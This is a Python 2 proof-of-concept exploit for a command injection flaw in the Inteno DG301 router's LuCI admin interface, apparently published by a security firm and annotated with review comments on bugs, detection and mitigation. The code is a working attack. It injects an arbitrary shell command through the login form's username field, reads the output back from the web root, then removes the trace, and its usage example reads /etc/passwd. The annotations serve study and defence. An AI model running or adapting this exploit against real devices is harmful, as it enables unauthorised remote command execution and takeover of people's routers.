#!/usr/bin/python
################################################################ # # # Inteno DG301 Command Injection PoC # # # # Vulnerable version: Powered by LuCI Trunk (inteno-1.0.34) # # OpenWrt Backfire 10.03.1-RC6 # # # # Written by Juan J. Guelfo @ Encripto AS # # post@encripto.no # # # # Copyright 2014 Encripto AS. All rights reserved. # # # # This software is licensed under the FreeBSD license. # # http://www.encripto.no/tools/license.php # # # ################################################################
import sys, getopt, urllib, urllib2
# Script metadata. Only __author__ ends up in the banner; see the note in
# header() about __version__.
__version__ = "0.1"
__author__ = "Juan J. Guelfo, Encripto AS (post@encripto.no)"

# NOTE(review): this file is Python 2 only (print statements, the
# `except X, err` form, urllib2); it does not parse under Python 3.


# Prints title and other header info
def header():
    print ""
    print " ================================================================= "
    # NOTE(review): the string below has no replacement field, so
    # .format(__version__) is a no-op and the version is never shown.
    print "| Inteno DG301 v1.0.34 Command Injection PoC \t\t\t |".format(__version__)
    print "| by {0}\t\t |".format(__author__)
    print " ================================================================= "
    print ""


# Prints help (banner plus usage text) and then terminates the process with
# exit status 0. Because of the sys.exit(0), nothing placed after a call to
# help() ever runs.
def help():
    header()
    # NOTE(review): the usage text's original line layout is not recoverable
    # from this copy of the file; the literal is kept exactly as found.
    print """ Usage: python Inteno-DG301-PoC.py [mandatory options]
Mandatory options: -t target ...Target IP address -p port ...Port where the HTTP admin interface is listening on -c cmd ...Command to inject Example: python Inteno-DG301-PoC.py -t 192.168.1.1 -p 80 -c "cat /etc/passwd" """
    sys.exit(0)


# What the script does, as written below:
#   1. POST to /cgi-bin/luci with the command wrapped in backticks inside the
#      `username` form field, its output redirected to /www/poc.txt.
#   2. GET /poc.txt to read that output back.
#   3. POST again with `rm /www/poc.txt` in the same field to delete the file.
# No login or session is established first and the credentials are the
# placeholders "user"/"pass", so the injection point appears to be reachable
# before authentication -- confirm against the vendor advisory.
#
# Defensive reading:
#   - Root cause (inferred from the payload shape, not visible here): the
#     login handler seems to hand the username to a shell unquoted. The fix
#     belongs on the device: never build a shell command line from form
#     fields, and reject shell metacharacters in credentials.
#   - Detection: backticks in the `username` parameter of a POST to
#     /cgi-bin/luci, a following GET for /poc.txt, and the fixed MSIE 8
#     User-Agent set below are all visible in HTTP logs or on the wire.
#   - Exposure: the request goes to the HTTP admin interface, so keeping that
#     interface off untrusted networks limits reachability until a fixed
#     firmware (<fixed-version placeholder; not given in this file>) is
#     installed.
if __name__ == '__main__':
    #Parse options
    try:
        options, args = getopt.getopt(sys.argv[1:], "t:p:c:", ["target=", "port=", "cmd="])
    except getopt.GetoptError, err:
        header()
        print "\n[-] Error: {0}.\n".format(str(err))
        sys.exit(1)

    # No options at all: show usage (help() exits with status 0).
    if not options:
        help()

    target = None
    port = None
    cmd = None
    # NOTE(review): `reset` is assigned but never read.
    reset = None
    # NOTE(review): ("-t") is a plain string, not a one-element tuple, so
    # `in` is a substring test. The long options accepted by getopt above
    # ("--target", "--port", "--cmd") never match and are silently dropped,
    # which sends the run to the usage path below.
    for opt, arg in options:
        if opt in ("-t"):
            target = arg
        if opt in ("-p"):
            port = arg
        if opt in ("-c"):
            cmd = arg

    #Option input validation
    # Only presence is checked; target and port are interpolated into the URL
    # below without any further validation.
    if not target or not port or not cmd:
        help()
        # NOTE(review): unreachable -- help() has already called sys.exit(0),
        # so this error path exits with status 0 and never prints the message.
        print "[-] Error: Incorrect syntax.\n"
        sys.exit(1)

    header()
    print "[*] Trying to connect to {0}:{1}...".format(target, port)
    # Fixed browser-like User-Agent sent with all three requests.
    headers = { "User-Agent" : "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)"}

    try:
        # Inject command
        # The form body is built by hand: urllib.quote() percent-encodes the
        # command (leaving "/" as is), and the backticks and the redirect to
        # /www/poc.txt are appended around it. Passing a data argument makes
        # urllib2 send a POST.
        print "[*] Sending command: {0}".format(cmd)
        data = "username=user`"+ urllib.quote(cmd) + "%20>%20/www/poc.txt`&password=pass"
        r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers)
        results = urllib2.urlopen(r).read()

        # Retrieve results
        # data is None here, so this is a GET. That the file is served at
        # /poc.txt implies /www is the web root on the device (presumably;
        # verify on the firmware).
        r = urllib2.Request("http://%s:%s/poc.txt" % (target, port), None, headers)
        results = urllib2.urlopen(r).read()

        # Show results
        print "[+] Retrieving results...\n"
        print results

        # Clean output file
        # This runs only if both requests above succeeded. If either raised,
        # /www/poc.txt is left behind on the device; a stray poc.txt in the
        # web root is therefore an artifact to look for when triaging a
        # device.
        data = "username=user`rm%20/www/poc.txt`&password=pass"
        r = urllib2.Request("http://%s:%s/cgi-bin/luci" % (target, port), data, headers)
        results = urllib2.urlopen(r).read()
        print "[*] Cleaning up...\n"

    # NOTE(review): urllib2.HTTPError derives from URLError, so an HTTP error
    # status (for example a 404 for /poc.txt) is also reported with the
    # connection message below. No timeout is passed to urlopen(), so a
    # silent host can block the script.
    except urllib2.URLError:
        print "[-] Error: The connection could not be established.\n"
    except IOError as e:
        print "[-] Error: {0}...\n".format(e.strerror)

    # Exit status is 0 on this path whether or not the requests succeeded.
    sys.exit(0)